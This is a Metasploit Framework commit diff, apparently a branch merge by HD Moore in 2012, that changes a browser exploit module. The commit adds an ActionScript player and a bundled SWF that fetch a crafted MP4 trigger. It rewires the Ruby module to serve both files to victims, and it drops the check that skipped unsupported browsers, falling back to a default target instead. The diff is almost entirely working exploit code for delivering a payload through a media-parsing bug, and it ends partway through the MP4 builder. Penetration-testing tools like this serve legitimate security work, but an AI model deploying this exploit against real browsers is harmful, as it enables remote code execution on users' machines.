Merge branch 'mp4-player'

unstable
HD Moore 2012-03-08 15:47:25 -06:00
commit 0c70586625
4 changed files with 50 additions and 8 deletions

View File

@ -0,0 +1,22 @@
function randText(newLength:Number):String{
var a:String = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
var alphabet:Array = a.split("");
var randomLetter:String = "";
for (var i:Number = 0; i < newLength; i++){
randomLetter += alphabet[Math.floor(Math.random() * alphabet.length)];
}
return randomLetter;
}
var connect_nc:NetConnection = new NetConnection();
connect_nc.connect(null);
var stream_ns:NetStream = new NetStream(connect_nc);
stream_ns.onStatus = function(p_evt:Object):Void { }
video.attachVideo(stream_ns);
stream_ns.play(randText(Math.floor(Math.random() * 8) + 4) + ".mp4");

BIN
data/exploits/mp4player.fla Executable file

Binary file not shown.

BIN
data/exploits/mp4player.swf Executable file

Binary file not shown.

View File

@ -69,8 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation']),
OptString.new('SWF_PLAYER_URI', [true, 'Path to the SWF Player'])
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
], self.class)
end
@ -94,19 +93,32 @@ class Metasploit3 < Msf::Exploit::Remote
# Avoid the attack if the victim doesn't have the same setup we're targeting
if my_target.nil?
print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}")
send_not_found(cli)
return
#send_not_found(cli)
#return
my_target = targets[1]
end
# The SWF requests our MP4 trigger
if request.uri =~ /\.mp4$/
print_status("Sending MP4 to #{cli.peerhost}:#{cli.peerport}...")
#print_error("Sorry, not sending you the mp4 for now")
#send_not_found(cli)
send_response(cli, @mp4, {'Content-Type'=>'video/mp4'})
return
end
# The SWF request itself
if request.uri =~ /\.swf$/
print_status("Sending SWF to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash'})
return
end
# Redirect to a trailing slash so relative paths work properly
if resource_uri != "/" and not request.uri.index("#{resource_uri}/")
uri = resource_uri + "/"
send_redirect(cli, uri)
return
end
# Set payload depending on target
p = payload.encoded
@ -140,8 +152,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
mp4_uri = "http://#{myhost}:#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.mp4"
swf_uri = "#{datastore['SWF_PLAYER_URI']}?autostart=true&image=video.jpg&file=#{mp4_uri}"
swf_uri = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".swf"
html = %Q|
<html>
@ -166,9 +177,18 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
@mp4 = create_mp4
@swf = create_swf
super
end
def create_swf
path = ::File.join( Msf::Config.install_root, "data", "exploits", "mp4player.swf" )
fd = ::File.open( path, "rb" )
swf = fd.read(fd.stat.size)
fd.close
return swf
end
def create_mp4
ftypAtom = "\x00\x00\x00\x20" #Size
ftypAtom << "ftypisom"